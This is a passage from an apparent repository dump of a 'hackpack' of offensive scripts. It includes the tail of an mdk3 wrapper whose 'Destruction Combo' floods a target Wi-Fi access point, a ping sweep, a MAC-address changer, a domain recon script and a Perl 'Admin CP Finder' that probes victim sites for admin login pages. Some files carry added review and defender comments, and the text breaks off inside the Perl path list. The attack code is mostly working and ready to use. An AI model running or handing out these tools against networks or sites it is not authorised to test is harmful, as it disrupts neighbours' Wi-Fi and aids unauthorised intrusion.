        # Spin forever; only KeyboardInterrupt (handled below and in waiter) ends it.
        while 1:
            waiter(" ATTACK IS RUNNING !!! HIT CTRL+C TWICE TO STOP THE TASK...")
    else:
        os.system('clear')
        print("\n\t/!\\/!\\/!\\ WARNING /!\\/!\\/!\\\n")
        print(" You've choosen DESTRUCTION MODE")
        print(" Using this mode may harm your WiFi card, use it at your own risks.")
        # Anything other than y/Y aborts.
        validate = raw_input(" Do you wish to continue? (y/N): ")
        if validate.upper() != "Y":
            print(" Ok, exiting now")
            exit(0)
        else:
            out=open("ap****er.log","a")
            out.write("\n ----- "+ctime()+" : Launching Destruction Combo. Target is AP %s|%s on channel %s -----" % (attack_opt[1], attack_opt[2], attack_opt[3]))
            out.close()
            print("\n Launching Destruction Combo\n Target is AP %s|%s on channel %s" % (attack_opt[1], attack_opt[2], attack_opt[3]))
            print(" Please be kind with your neighbours xD")
            # Four threads share the same option list and the same log file.
            mdk3("B", attack_opt).start()
            mdk3("A", attack_opt).start()
            mdk3("D", attack_opt).start()
            mdk3("M", attack_opt).start()
            ##wids may raise a segfault(internal mdk3 problem when multiple attacks apparently)
            #mdk3("W",attack_opt).start()
            sleep(1)
            print; print; print
            while 1:
                waiter(" DESTRUCTION COMBO IS RUNNING !!! HIT CTRL+C TWICE TO STOP THE TASK...")
except KeyboardInterrupt:
    clean_exit()
249 |
--------------------------------------------------------------------------------
/hackpack/hackpack/Find_Hosts.sh:
--------------------------------------------------------------------------------
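#!/bin/bash
#
# Find Hosts: send one ICMP echo to each address .1-.254 of a /24 prefix and
# print the addresses that answer.
#
# Changes from the original listing:
#   - the prefix is validated before it reaches ping (it was passed unquoted,
#     so spaces or a leading "-" were interpreted as extra arguments/options);
#   - `read -r` keeps backslashes literal;
#   - the script waits for the background pings, so replies are no longer
#     printed after the prompt has already returned.

clear
echo
echo Find Hosts
echo
echo
echo By Lee Baird
echo March 23, 2007
echo "v 0.2"
echo
echo "This script will find all live hosts in a Class C range."
echo
echo Usage: 192.168.1
echo Enter the Class C range.
echo
read -r class
echo

# Accept exactly three dotted decimal groups; anything else is rejected
# before it can be handed to ping.
prefix_re='^([0-9]{1,3}\.){2}[0-9]{1,3}$'
if [[ ! "$class" =~ $prefix_re ]]; then
  echo "Invalid range: expected three octets such as 192.168.1" >&2
  exit 1
fi

echo "####################"
echo
for x in {1..254}; do
  # One probe per address, run in the background; only the replying address
  # (field 4 of the "bytes from" line, minus the trailing colon) is printed.
  ping -c 1 "$class.$x" | grep "bytes from" | cut -d " " -f4 | cut -d ":" -f1 &
done
# Block until every background probe has finished before the final newline.
wait
echo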
25 |
--------------------------------------------------------------------------------
/hackpack/hackpack/MACchanger.sh:
--------------------------------------------------------------------------------
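#!/bin/bash

# MACchanger script written by em3rgency
# This script automates the task of changing the MAC address of your NIC:
# it takes the interface down, asks macchanger for a random address and
# brings the interface back up.
#
# Changes from the original listing:
#   - the interface name is validated and quoted before it reaches
#     ifconfig/macchanger (it was passed unquoted, straight from `read`);
#   - each step is checked, so the success message is only printed when the
#     address really changed, and the interface is brought back up if
#     macchanger fails;
#   - the terminal colour is reset on exit.

# DEFINED COLOR SETTINGS
RED=$(tput setaf 1 && tput bold)
GREEN=$(tput setaf 2 && tput bold)
STAND=$(tput sgr0)
BLUE=$(tput setaf 6 && tput bold)

# Print the banner and the "updates" line shown on both screens.
banner() {
  echo "${RED} +############################################+"
  echo "${RED} + em3rgency's MACchanger Script +"
  echo "${RED} + +"
  echo "${RED} + Version 1.0 +"
  echo "${RED} + +"
  echo "${RED} + www.em3rgency.com +"
  echo "${RED} +############################################+"
  echo ""
  echo "${BLUE} Visit http://www.em3rgency.com for updates to this script. Thanks ${BLUE}"
  echo ""
  echo ""
  echo ""
}

# Print an error in red on stderr, reset the colour and stop.
die() {
  echo "${RED} $*${STAND}" >&2
  exit 1
}

echo ""
echo ""
echo ""
banner

echo -n " Finding your Network Interfaces for you... ${GREEN}"
sleep 2
echo ""
ifconfig -a | cut -d " " -f1 | sed '/^$/d' | grep -E -v 'lo|vm'
echo ""

echo "${BLUE} Please enter the the interface you want the mac to change for EG. mon0 or wlan0: "
read -r NIC
echo ""

# The name must start with a letter or digit (so it can never be parsed as an
# option) and must be an interface ifconfig actually knows about.
nic_re='^[A-Za-z0-9][A-Za-z0-9_.-]*$'
if [[ ! "$NIC" =~ $nic_re ]]; then
  die "Invalid interface name"
fi
if ! ifconfig "$NIC" >/dev/null 2>&1; then
  die "Interface $NIC not found"
fi

sleep 2
clear

banner
sleep 2
echo " Taking Your Interface Down... "
ifconfig "$NIC" down || die "Could not take $NIC down"
sleep 2
echo ""
echo ""
echo " Changing your MAC address... "
if ! macchanger -r "$NIC"; then
  # Do not leave the interface down when the change itself failed.
  ifconfig "$NIC" up
  die "macchanger failed; $NIC keeps its previous MAC address"
fi
sleep 2
echo ""
echo ""
echo " Bringing your Interface Up... "
ifconfig "$NIC" up || die "Could not bring $NIC back up"
echo ""
echo ""
echo "Your Mac is now random Thank you for using MAC changer! "
echo ""
echo ""
read -r -p "Please press ENTER to exit the script"
# Reset colours so the calling terminal is not left in bold cyan.
echo -n "${STAND}"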
75 |
76 |
77 |
78 |
--------------------------------------------------------------------------------
/hackpack/hackpack/Recon.sh:
--------------------------------------------------------------------------------
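#!/bin/bash
#
# Recon: runs a fixed sequence of lookup and scanning tools against one
# domain and prints each command before its output.
#
# Changes from the original listing:
#   - the domain is validated and quoted; it was passed unquoted from `read`
#     to every tool, so spaces or a leading "-" became extra arguments;
#   - each `cd` is checked; previously a missing tool directory meant the
#     following relative command (for example ./lbd.sh) ran from whatever
#     directory the script happened to be in;
#   - `read -r` keeps backslashes literal.
#
# NOTE(review): nmap writes temp.txt into the current directory with a fixed
# name and amap reads it back; an existing temp.txt there is overwritten.

RULE="###########################################################################################"

# Change into a tool's directory and run it there; skip the tool with a
# message on stderr when the directory does not exist. The directory change
# persists, as it did in the original script.
in_dir() {
  local dir=$1
  shift
  if cd "$dir"; then
    "$@"
  else
    echo "Skipping: cannot cd to $dir" >&2
  fi
}

clear
echo
echo Recon
echo
echo
echo By Lee Baird
echo March 26, 2009
echo "v 0.11"
echo
echo "This script will perform various reconnaissance on your target."
echo
echo Usage: domain.com
echo Enter the domain.
echo
read -r domain
echo

# Letters, digits, dots and hyphens only, starting and ending with a letter
# or digit, so the value can never be taken for an option or split in two.
domain_re='^[A-Za-z0-9]([A-Za-z0-9.-]*[A-Za-z0-9])?$'
if [[ ! "$domain" =~ $domain_re ]]; then
  echo "Invalid domain: expected a host name such as domain.com" >&2
  exit 1
fi

echo "$RULE"
echo
echo "whois $domain"
whois "$domain"
echo "$RULE"
echo
echo "dig $domain any"
dig "$domain" any
echo "$RULE"
echo
echo "host -l $domain"
echo
host -l "$domain"
echo
echo "$RULE"
echo
echo "tcptraceroute -i eth0 $domain"
echo
tcptraceroute -i eth0 "$domain"
echo
echo "$RULE"
echo
echo "cd /pentest/enumeration/dnsenum"
echo "perl dnsenum.pl --enum -f dns.txt --update a -r $domain"
echo
in_dir /pentest/enumeration/dnsenum perl dnsenum.pl --enum -f dns.txt --update a -r "$domain"
echo
echo "$RULE"
echo
echo "dnstracer $domain"
echo
dnstracer "$domain"
echo
echo "$RULE"
echo
echo "cd /pentest/enumeration/fierce"
echo "perl fierce.pl -dns $domain"
echo
in_dir /pentest/enumeration/fierce perl fierce.pl -dns "$domain"
echo
echo "$RULE"
echo
echo "cd /pentest/enumeration/lbd"
echo "./lbd.sh $domain"
in_dir /pentest/enumeration/lbd ./lbd.sh "$domain"
echo "$RULE"
echo
echo "cd /pentest/enumeration/list-urls"
echo "./list-urls.py http://www.$domain"
in_dir /pentest/enumeration/list-urls ./list-urls.py "http://www.$domain"
echo
echo "$RULE"
echo
echo "nmap -PN -n -F -T4 -sV -A -oG temp.txt $domain"
# temp.txt is written to, and later read from, the current directory; warn
# if that directory is not the intended /root.
cd /root || echo "Warning: cannot cd to /root, temp.txt goes to $PWD" >&2
nmap -PN -n -F -T4 -sV -A -oG temp.txt "$domain"
echo
echo "$RULE"
echo
echo "amap -i temp.txt"
amap -i temp.txt
echo
echo "$RULE"
echo
echo "cd /pentest/enumeration/www/httprint/linux"
echo "./httprint -h www.$domain -s signatures.txt -P0"
echo
in_dir /pentest/enumeration/www/httprint/linux ./httprint -h "www.$domain" -s signatures.txt -P0
echo
echo "$RULE"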
94 |
--------------------------------------------------------------------------------
/hackpack/hackpack/admin.pl:
--------------------------------------------------------------------------------
1 | #!/usr/bin/perl
2 |
3 | use HTTP::Request;
4 | use LWP::UserAgent;
5 |
6 | system('cls');
7 | system('title Admin CP Finder ');
8 | system "color 0a";
9 | print"\n";
10 | print "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
11 | print "\t> Admin CP Finder >\n";
12 | print "\t> Created By CyberToxic1101 >\n";
13 | print "\t> Visit my page on FACEBOOK >\n";
14 | print "\t> https://www.facebook.com/www.kali.org >\n";
15 | print "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
16 | print "\n";
17 |
18 | print " Please Enter Site\n Example: www.victim.com or www.victim.com/path\n-> ";
19 | $site=;
20 | chomp $site;
21 |
22 | print "\n";
23 | print " Enter site source code\n\n 1 = php\n 2 = asp\n 3 = aspx\n 4 = cfm\n 5 = js\n 6 = cgi\n 7 = brf\n\n-> ";
24 | $code=;
25 | chomp($code);
26 |
27 | if ( $site !~ /^http:/ ) {
28 | $site = 'http://' . $site;
29 | }
30 | if ( $site !~ /\/$/ ) {
31 | $site = $site . '/';
32 | }
33 | print "\n";
34 |
35 | print "-> Target: $site\n";
36 | print "-> Site source code: $code\n";
37 | print "-> Searching admin cp...\n\n\n";
38 |
39 | if($code eq "2"){
40 |
41 | @path1=('admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
42 | 'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
43 | 'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
44 | 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',
45 | 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
46 | 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
47 | 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
48 | 'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',
49 | 'administrator/account.asp','administrator.asp','acceso.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',
50 | 'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
51 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html',
52 | 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
53 | 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
54 | 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',
55 | 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',
56 | 'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html',
57 | 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
58 | 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
59 | 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html'
60 | );
61 |
62 | foreach $ways(@path1){
63 |
64 | $final=$site.$ways;
65 |
66 | my $req=HTTP::Request->new(GET=>$final);
67 | my $ua=LWP::UserAgent->new();
68 | $ua->timeout(30);
69 | my $response=$ua->request($req);
70 |
71 | if($response->content =~ /Username/ ||
72 | $response->content =~ /Password/ ||
73 | $response->content =~ /username/ ||
74 | $response->content =~ /password/ ||
75 | $response->content =~ /USERNAME/ ||
76 | $response->content =~ /PASSWORD/ ||
77 | $response->content =~ /Username/ ||
78 | $response->content =~ /Wachtwoord/ ||
79 | $response->content =~ /Senha/ ||
80 | $response->content =~ /senha/ ||
81 | $response->content =~ /Personal/ ||
82 | $response->content =~ /Usuario/ ||
83 | $response->content =~ /Clave/ ||
84 | $response->content =~ /Usager/ ||
85 | $response->content =~ /usager/ ||
86 | $response->content =~ /Sing/ ||
87 | $response->content =~ /passe/ ||
88 | $response->content =~ /P\/W/ ||
89 | $response->content =~ /Admin Password/
90 | ){
91 | print " \n [+] Found -> $final\n\n";
92 | }else{
93 | print "[-] Not Found <- $final\n";
94 | }
95 | }
96 | }
97 |
# Branch for $code "1": requests every candidate admin/login path below (directory
# names plus .php, .html and a few .asp pages) under $site and prints, per URL,
# whether the response body looks like a login form.
# NOTE(review): $site and $code are assigned outside this excerpt — presumably
# operator input; confirm how they are validated.
# Defender view: the run is one GET per list entry from a single client, so it
# appears in access logs as a dense burst of requests for admin-style paths,
# most of which will not exist on a given site.
98 | if($code eq "1"){
99 |
# Candidate relative paths. Some entries repeat (e.g. 'administrator/' and
# 'admin/account.php'), so those URLs are fetched more than once.
100 | @path2=('admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
101 | 'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php',
102 | 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
103 | 'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html',
104 | 'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
105 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
106 | 'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php',
107 | 'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
108 | 'bb-admin/index.html','bb-admin/login.html','acceso.php','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',
109 | 'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
110 | 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',
111 | 'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
112 | 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
113 | 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
114 | 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
115 | 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php',
116 | 'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php',
117 | 'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','usuarios/login.php',
118 | 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php'
119 | );
120 |
121 | foreach $ways(@path2){
122 |
# Plain concatenation: assumes $site already ends with '/' — TODO confirm where
# $site is built.
123 | $final=$site.$ways;
124 |
# A new LWP::UserAgent is created for every request with a 30 second timeout.
# No agent string is set, so requests carry the library default
# (libwww-perl/<version>), which is easy to match in server logs or a WAF rule.
125 | my $req=HTTP::Request->new(GET=>$final);
126 | my $ua=LWP::UserAgent->new();
127 | $ua->timeout(30);
128 | my $response=$ua->request($req);
129 |
# "Found" depends only on case-sensitive keyword matches in the body; the HTTP
# status is never checked. Any page containing e.g. "password", "Personal" or
# "Sing" (including a custom error page) is reported as a hit, so results need
# manual confirmation. /Username/ is tested twice; the second test is redundant.
130 | if($response->content =~ /Username/ ||
131 | $response->content =~ /Password/ ||
132 | $response->content =~ /username/ ||
133 | $response->content =~ /password/ ||
134 | $response->content =~ /USERNAME/ ||
135 | $response->content =~ /PASSWORD/ ||
136 | $response->content =~ /Username/ ||
137 | $response->content =~ /Wachtwoord/ ||
138 | $response->content =~ /Senha/ ||
139 | $response->content =~ /senha/ ||
140 | $response->content =~ /Personal/ ||
141 | $response->content =~ /Usuario/ ||
142 | $response->content =~ /Clave/ ||
143 | $response->content =~ /Usager/ ||
144 | $response->content =~ /usager/ ||
145 | $response->content =~ /Sing/ ||
146 | $response->content =~ /passe/ ||
147 | $response->content =~ /P\/W/ ||
148 | $response->content =~ /Admin Password/
149 | ){
150 | print " \n [+] Found -> $final\n\n";
151 | }else{
# Every non-matching response lands here, whatever its status code.
152 | print "[-] Not Found <- $final\n";
153 | }
154 | }
155 | }
156 |
157 |
# Branch for $code "4": requests every candidate admin/login path below (directory
# names plus .cfm, .html and a few .asp pages) under $site and prints, per URL,
# whether the response body looks like a login form.
# NOTE(review): $site and $code are assigned outside this excerpt — presumably
# operator input; confirm how they are validated.
# Defender view: one GET per list entry from a single client; in access logs this
# is a dense burst of requests for admin-style paths.
158 | if($code eq "4"){
159 |
# Candidate relative paths. Some entries repeat (e.g. 'administrator/' and
# 'admin/account.cfm'), so those URLs are fetched more than once.
160 | @path2=('admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
161 | 'memberadmin/','administratorlogin/','adm/','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm','admin/account.cfm',
162 | 'admin_area/admin.cfm','admin_area/login.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
163 | 'admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm','admin/home.cfm','admin_area/login.html','admin_area/index.html',
164 | 'admin/controlpanel.cfm','admin.cfm','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
165 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
166 | 'admin/cp.cfm','cp.cfm','administrator/index.cfm','administrator/login.cfm','nsw/admin/login.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm',
167 | 'administrator/account.cfm','administrator.cfm','admin_area/admin.html','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm',
168 | 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm',
169 | 'moderator/admin.cfm','account.cfm','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.cfm','admincontrol.cfm',
170 | 'admin/adminLogin.html','acceso.cfm','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.cfm','adminarea/index.html','adminarea/admin.html',
171 | 'webadmin.cfm','webadmin/index.cfm','webadmin/admin.cfm','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.cfm','moderator.html',
172 | 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
173 | 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
174 | 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.cfm','account.html','controlpanel.html','admincontrol.html',
175 | 'panel-administracion/login.cfm','wp-login.cfm','adminLogin.cfm','admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm',
176 | 'adminarea/admin.cfm','adminarea/login.cfm','panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm',
177 | 'modelsearch/admin.cfm','admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','usuarios/login.cfm',
178 | 'adm/index.cfm','adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm'
179 | );
180 |
181 | foreach $ways(@path2){
182 |
# Plain concatenation: assumes $site already ends with '/' — TODO confirm where
# $site is built.
183 | $final=$site.$ways;
184 |
# A new LWP::UserAgent per request, 30 second timeout, no agent string set: the
# requests carry the library default (libwww-perl/<version>), which is easy to
# match in server logs or a WAF rule.
185 | my $req=HTTP::Request->new(GET=>$final);
186 | my $ua=LWP::UserAgent->new();
187 | $ua->timeout(30);
188 | my $response=$ua->request($req);
189 |
# "Found" depends only on case-sensitive keyword matches in the body; the HTTP
# status is never checked, so any page containing e.g. "password", "Personal" or
# "Sing" counts as a hit and results need manual confirmation. /Username/ is
# tested twice; the second test is redundant.
190 | if($response->content =~ /Username/ ||
191 | $response->content =~ /Password/ ||
192 | $response->content =~ /username/ ||
193 | $response->content =~ /password/ ||
194 | $response->content =~ /USERNAME/ ||
195 | $response->content =~ /PASSWORD/ ||
196 | $response->content =~ /Username/ ||
197 | $response->content =~ /Wachtwoord/ ||
198 | $response->content =~ /Senha/ ||
199 | $response->content =~ /senha/ ||
200 | $response->content =~ /Personal/ ||
201 | $response->content =~ /Usuario/ ||
202 | $response->content =~ /Clave/ ||
203 | $response->content =~ /Usager/ ||
204 | $response->content =~ /usager/ ||
205 | $response->content =~ /Sing/ ||
206 | $response->content =~ /passe/ ||
207 | $response->content =~ /P\/W/ ||
208 | $response->content =~ /Admin Password/
209 | ){
210 | print " \n [+] Found -> $final\n\n";
211 | }else{
# Every non-matching response lands here, whatever its status code.
212 | print "[-] Not Found <- $final\n";
213 | }
214 | }
215 | }
216 |
# Branch for $code "3": requests every candidate admin/login path below (directory
# names plus .aspx, .html and a few .asp pages) under $site and prints, per URL,
# whether the response body looks like a login form.
# NOTE(review): $site and $code are assigned outside this excerpt — presumably
# operator input; confirm how they are validated.
# Defender view: one GET per list entry from a single client; in access logs this
# is a dense burst of requests for admin-style paths.
217 | if($code eq "3"){
218 |
# Candidate relative paths. Some entries repeat (e.g. 'administrator/' and
# 'admin/account.aspx'), so those URLs are fetched more than once.
219 | @path2=('admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
220 | 'memberadmin/','administratorlogin/','adm/','admin/account.aspx','admin/index.aspx','admin/login.aspx','admin/admin.aspx','admin/account.aspx',
221 | 'admin_area/admin.aspx','admin_area/login.aspx','siteadmin/login.aspx','siteadmin/index.aspx','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
222 | 'admin_area/index.aspx','bb-admin/index.aspx','bb-admin/login.aspx','bb-admin/admin.aspx','admin/home.aspx','admin_area/login.html','admin_area/index.html',
223 | 'admin/controlpanel.aspx','admin.aspx','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
224 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
225 | 'admin/cp.aspx','cp.aspx','administrator/index.aspx','administrator/login.aspx','nsw/admin/login.aspx','webadmin/login.aspx','admin/admin_login.aspx','admin_login.aspx',
226 | 'administrator/account.aspx','administrator.aspx','admin_area/admin.html','pages/admin/admin-login.aspx','admin/admin-login.aspx','admin-login.aspx',
227 | 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.aspx','modelsearch/login.aspx','moderator.aspx','moderator/login.aspx',
228 | 'moderator/admin.aspx','acceso.aspx','account.aspx','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.aspx','admincontrol.aspx',
229 | 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.aspx','adminarea/index.html','adminarea/admin.html',
230 | 'webadmin.aspx','webadmin/index.aspx','webadmin/admin.aspx','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.aspx','moderator.html',
231 | 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
232 | 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
233 | 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.aspx','account.html','controlpanel.html','admincontrol.html',
234 | 'panel-administracion/login.aspx','wp-login.aspx','adminLogin.aspx','admin/adminLogin.aspx','home.aspx','admin.aspx','adminarea/index.aspx',
235 | 'adminarea/admin.aspx','adminarea/login.aspx','panel-administracion/index.aspx','panel-administracion/admin.aspx','modelsearch/index.aspx',
236 | 'modelsearch/admin.aspx','admincontrol/login.aspx','adm/admloginuser.aspx','admloginuser.aspx','admin2.aspx','admin2/login.aspx','admin2/index.aspx','usuarios/login.aspx',
237 | 'adm/index.aspx','adm.aspx','affiliate.aspx','adm_auth.aspx','memberadmin.aspx','administratorlogin.aspx'
238 | );
239 |
240 | foreach $ways(@path2){
241 |
# Plain concatenation: assumes $site already ends with '/' — TODO confirm where
# $site is built.
242 | $final=$site.$ways;
243 |
# A new LWP::UserAgent per request, 30 second timeout, no agent string set: the
# requests carry the library default (libwww-perl/<version>), which is easy to
# match in server logs or a WAF rule.
244 | my $req=HTTP::Request->new(GET=>$final);
245 | my $ua=LWP::UserAgent->new();
246 | $ua->timeout(30);
247 | my $response=$ua->request($req);
248 |
# "Found" depends only on case-sensitive keyword matches in the body; the HTTP
# status is never checked, so any page containing e.g. "password", "Personal" or
# "Sing" counts as a hit and results need manual confirmation. /Username/ is
# tested twice; the second test is redundant.
249 | if($response->content =~ /Username/ ||
250 | $response->content =~ /Password/ ||
251 | $response->content =~ /username/ ||
252 | $response->content =~ /password/ ||
253 | $response->content =~ /USERNAME/ ||
254 | $response->content =~ /PASSWORD/ ||
255 | $response->content =~ /Username/ ||
256 | $response->content =~ /Wachtwoord/ ||
257 | $response->content =~ /Senha/ ||
258 | $response->content =~ /senha/ ||
259 | $response->content =~ /Personal/ ||
260 | $response->content =~ /Usuario/ ||
261 | $response->content =~ /Clave/ ||
262 | $response->content =~ /Usager/ ||
263 | $response->content =~ /usager/ ||
264 | $response->content =~ /Sing/ ||
265 | $response->content =~ /passe/ ||
266 | $response->content =~ /P\/W/ ||
267 | $response->content =~ /Admin Password/
268 | ){
269 | print " \n [+] Found -> $final\n\n";
270 | }else{
# Every non-matching response lands here, whatever its status code.
271 | print "[-] Not Found <- $final\n";
272 | }
273 | }
274 | }
275 |
276 |
# Branch for $code "5": requests every candidate admin/login path below (directory
# names plus .js, .html and a few .asp pages) under $site and prints, per URL,
# whether the response body looks like a login form.
# NOTE(review): $site and $code are assigned outside this excerpt — presumably
# operator input; confirm how they are validated.
# Defender view: one GET per list entry from a single client; in access logs this
# is a dense burst of requests for admin-style paths.
277 | if($code eq "5"){
278 |
# Candidate relative paths. Some entries repeat (e.g. 'administrator/' and
# 'admin/account.js'), so those URLs are fetched more than once.
279 | @path2=('admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
280 | 'memberadmin/','administratorlogin/','adm/','admin/account.js','admin/index.js','admin/login.js','admin/admin.js','admin/account.js',
281 | 'admin_area/admin.js','admin_area/login.js','siteadmin/login.js','siteadmin/index.js','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
282 | 'admin_area/index.js','bb-admin/index.js','bb-admin/login.js','bb-admin/admin.js','admin/home.js','admin_area/login.html','admin_area/index.html',
283 | 'admin/controlpanel.js','admin.js','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
284 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
285 | 'admin/cp.js','cp.js','administrator/index.js','administrator/login.js','nsw/admin/login.js','webadmin/login.js','admin/admin_login.js','admin_login.js',
286 | 'administrator/account.js','administrator.js','admin_area/admin.html','pages/admin/admin-login.js','admin/admin-login.js','admin-login.js',
